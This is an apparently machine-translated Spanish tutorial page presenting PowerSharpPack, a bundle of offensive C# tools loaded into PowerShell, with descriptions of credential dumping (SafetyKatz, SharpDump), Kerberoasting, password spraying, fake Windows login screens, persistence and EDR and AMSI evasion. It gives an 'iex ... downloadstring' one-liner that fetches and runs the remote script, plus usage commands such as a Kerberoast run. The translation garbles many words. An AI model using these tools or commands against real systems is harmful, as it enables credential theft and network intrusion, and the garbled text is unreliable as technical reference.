Tutoriales

Proyectos ofensivos de CSharp envueltos en Powershell

PowerSharpPack es una utensilio con muchos proyectos CSharp ofensivos bártulos incorporados a Powershell para suministrar su uso.

¿Por qué? En mi opinión personal, el Powershell ofensivo no está muerto oportuno a AMSI, registro de bloques de scripts, modo de lengua restringido u otras características de protección. Cualquiera de estos mecanismos puede evitarse. Cedido que la mayoría de los proyectos innovadores de seguridad ataque están escritos en C #, decidí hacerlos utilizables asimismo en PowerShell.

  • Entonces, ¿qué hice básicamente aquí?
    • En primer circunstancia, clone cada C # Repo.
    • Establecer la clase y los métodos principales como públicos
    • Para algunos proyectos, fusioné solicitudes de ascendencia con nuevas funciones o correcciones de errores o tuve que eliminar las declaraciones environment.exit para que no se elimine todo el proceso de powershell por desliz de parámetros, etc.
    • Luego compilando cada binario
    • Gzip-compress y base64-Codifica el binario base64 compilado y cárgalo en powershell a través de [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

Es un proceso muy sencillo pero para muchos repositorios que consume mucho tiempo.

¿Qué herramientas están incluidas?

Ataque de monólogo interno: recuperación de hash NTLM sin tocar LSASS

@Crédito a: https://github.com/eladshamir/Internal-Monologue

Seatbelt es un plan de C # que realiza una serie de «controles de seguridad» de encuestas de host orientados a la seguridad, relevantes desde las perspectivas de seguridad tanto ofensivas como defensivas.

@Crédito a: https://github.com/GhostPack/Seatbelt

Tesina .NET 2.0 CLR para recuperar las credenciales del navegador guardadas de Google Chrome, Mozilla Firefox y Microsoft Internet Explorer / Edge.

@Crédito a: https://github.com/djhohnstein/SharpWeb

Crea una sección RW tópico en UrbanBishop y luego mapea esa sección como RX en un proceso remoto. La carga de Shellcode es más sencillo.

@Crédito a: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp es un puerto C # de varias funciones de PowerUp.

@Crédito a: https://github.com/GhostPack/SharpUp

Rubeus es un conjunto de herramientas de C # para interacciones y abusos sin procesar de Kerberos.

@Crédito a: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

Kit de herramientas de persistencia de Windows escrito en C #.

@Crédito a: https://github.com/fireeye/SharPersist

Implementación de C # de PowerView de damagej0y

@Crédito a: https://github.com/tevora-threat/SharpView

Consulte la repertorio de comprobación de escalamiento de privilegios de Windows tópico en book.hacktricks.xyz

@Crédito a: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless permite la copia de archivos bloqueados.

@Crédito a: https://github.com/GhostPack/Lockless

Tesina .NET 4.0 CLR para recuperar datos de Chromium, como cookies, historial e inicios de sesión guardados.

@Crédito a: https://github.com/djhohnstein/SharpChromium

SharpDPAPI es un puerto C # de algunas funciones de Mimikatz DPAPI.

@Crédito a: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

Enumere todos los posibles compartidos de red en el dominio presente. Por otra parte, puede resolver nombres a direcciones IP.

@Crédito a: https://github.com/djhohnstein/SharpShares

Encuentre usuarios específicos en el directorio activo a través de su nombre de adjudicatario y dirección IP de inicio de sesión

@Crédito a: https://github.com/HunnicCyber/SharpSniper

SharpSpray es un conjunto de códigos simple para realizar un ataque de rociado de contraseñas contra todos los usuarios de un dominio que usan LDAP y es compatible con Cobalt Strike.

@Crédito a: https://github.com/jnqpblc/SharpSpray

Enumere los KB que faltan y sugiera exploits para vulnerabilidades de Privilege Escalation bártulos

@Crédito a: https://github.com/rasta-mouse/Watson

Encuentre vulnerabilidades en la política de liga de AD

@Crédito a: https://github.com/l0ss/Grouper2

Una utensilio para elevar los privilegios con tokens de Windows

@Crédito a: https://github.com/0xbadjuju/Tokenvator

Aparejo de búsqueda para encontrar archivos específicos que contienen palabras específicas, es sostener, archivos que contienen contraseñas.

@Crédito a: https://github.com/vivami/SauronEye

  • Simplemente cargue el script principal con

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

  • y elija la utensilio como parámetro de cambio, por ejemplo:

PowerSharpPack -seatbelt -Command "AMSIProviders"

Si desea tener lugar varios parámetros al binario, puede usar comillas como:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

Si no desea cargar todos los binarios por alguna razón, puede usar los scripts de Powershell por binario ubicados en la carpeta PowerSharpBinaries.

Proyectos que asimismo están disponibles como script de PowerShell independiente:

C # simple para repasar la existencia de archivos de credenciales relacionados con AWS, Microsoft Azure y Google Compute.

@Crédito a: https://github.com/chrismaddalena/SharpCloud

Descubrimiento de servicios SSDP

@Crédito a: https://github.com/rvrsh3ll/SharpSSDP

DAFT: Conjunto de herramientas y entorno de auditoría de bases de datos

@Crédito a: https://github.com/NetSPI/DAFT

Aparejo para descubrir rutas de ataque de delegación restringida basada en posibles en entornos de Active Directory

@Crédito a: https://github.com/FatRodzianko/Get-RBCD-Threaded

  • SharpGPO-RemoteAccessPolicies

Aparejo AC # para enumerar las políticas de entrada remoto a través de la política de liga.

@Crédito a: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

Adquisición de objetos informáticos a través de la delegación restringida basada en posibles (msDS-allowedToActOnBehalfOfOtherIdentity)

@Crédito a: https://github.com/pkb1s/SharpAllowedToAct

Tesina .NET 4.0 para interactuar con hardware de video, audio y teclado.

@Crédito a: https://github.com/djhohnstein/WireTap

Celador del portapapeles de C #

@Crédito a: https://github.com/slyd0g/SharpClipboard

Descubra las impresoras + compruebe si hay vulns

@Crédito a: https://github.com/rvrsh3ll/SharpPrinter

Aparejo para crear claves de registro ocultas.

@Crédito a: https://github.com/outflanknl/SharpHide

Aparejo PoC para conminar a los hosts de Windows a autenticarse en otras máquinas a través de la interfaz MS-RPRN RPC. Esto asimismo es posible a través de otros protocolos.

@Crédito a: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse es una aplicación .NET escrita en C # que se puede utilizar para emplear los derechos de estampación de un adjudicatario en un objeto de política de liga (GPO) con el fin de comprometer los objetos que están controlados por ese GPO.

@Crédito a: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump es un puerto C # de la funcionalidad Out-Minidump.ps1 de PowerSploit.

@Crédito a: https://github.com/GhostPack/SharpDump

Recopilador de datos de C # para el plan BloodHound, traducción 3

@Crédito a: https://github.com/BloodHoundAD/SharpHound3

SharpLocker ayuda a obtener las credenciales de adjudicatario actuales al desobstruir una pantalla de separación de Windows falsa, toda la salida se envía a la consola, lo que funciona perfectamente para Cobalt Strike.

@Crédito a: https://github.com/Pickfordmatt/SharpLocker

EyeWitness está diseñado para tomar capturas de pantalla de sitios web, proporcionar información del encabezado del servidor e identificar las credenciales predeterminadas, si es posible.

@Crédito a: https://github.com/FortyNorthSecurity/EyeWitness

Pantalla de inicio de sesión de Windows falsa para robar contraseñas

@Crédito a: https://github.com/bitsadmin/fakelogonscreen

Kit de herramientas de explotación posterior al espacio de ejecución de PowerShell

@Crédito a: https://github.com/Cn33liz/p0wnedShell

SafetyKatz es una combinación de una traducción tenuemente modificada del plan Mimikatz de @ gentilkiwi y el cargador .NET PE de @ subTee. Modifiqué este de nuevo con mi propia traducción Mimikatz ofuscada.

@Crédito a: https://github.com/GhostPack/SafetyKatz

Aparejo Windows C # LLMNR / mDNS / NBNS / DNS / DHCPv6 spoofer / man-in-the-middle.

@Crédito a: https://github.com/Kevin-Robertson/InveighZero

SharpSploit es una biblioteca de post-explotación de .NET escrita en C #.

@Crédito a: https://github.com/cobbr/SharpSploit

Una utensilio para pentesters para ayudar a encontrar dulces deliciosos, por @ l0ss y @ Sh3r4 (Twitter: @ / mikeloss y @ / sh3r4_hax).

@Crédito a: https://github.com/SnaffCon/Snaffler

itm4ns Printspoofer en C #.

@Crédito a: https://github.com/BeichenDream/BadPotato

Fork of SafetyKatz que obtiene dinámicamente la última traducción precompilada de Mimikatz directamente desde el repositorio de gentilkiwi GitHub, el tiempo de ejecución parchea las firmas y usa SharpSploit DInvoke para PE-Load en la memoria.

@Crédito a: https://github.com/Flangvik/BetterSafetyKatz

Puerto C # de los comandos mimikatz sekurlsa :: logonpasswords, sekurlsa :: ekeys y lsadump :: dcsync.

@Crédito a: https://github.com/b4rtik/SharpKatz

Aparejo de C # para descubrir frutas bajas.

@Crédito a: https://github.com/EncodeGroup/Gopher

IOXIDResolver de AirBus Security / PingCastle.

@Crédito a: https://github.com/vletoux/pingcastle/

Un método para eludir las DLL de proyección activa de EDR evitando la ejecución del punto de entrada.

@Crédito a: https://github.com/CCob/SharpBlock

Este software crea un mensaje de inicio de sesión para compilar el nombre de adjudicatario y la contraseña del adjudicatario presente. Este plan permite al equipo rojo suplantar el nombre de adjudicatario y la contraseña del adjudicatario presente sin tocar lsass y tener credenciales de administrador en el sistema.

@Crédito a: https://github.com/shantanu561993/SharpLoginPrompt

Recupera datos (contactos, correos electrónicos, historial, cookies y credenciales) de Thunderbird y Firefox.

Extrae datos de la saco de datos de Windows Sticky Notes. Funciona en Windows 10 Build 1607 y superior. Este plan no depende de dependencias externas.

@Crédito a: https://github.com/V1V1/SharpScribbles

Aparejo de movimiento colateral sin archivos que se apoyo en ChangeServiceConfigA para ejecutar el comando.

@Crédito a: https://github.com/Mr-Un1k0d3r/SCShell

Una traducción más nítida de CrackMapExec. Utilice comillas si desea tener lugar varios parámetros al binario.

@Crédito a: https://github.com/cube0x0/SharpMapExec

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba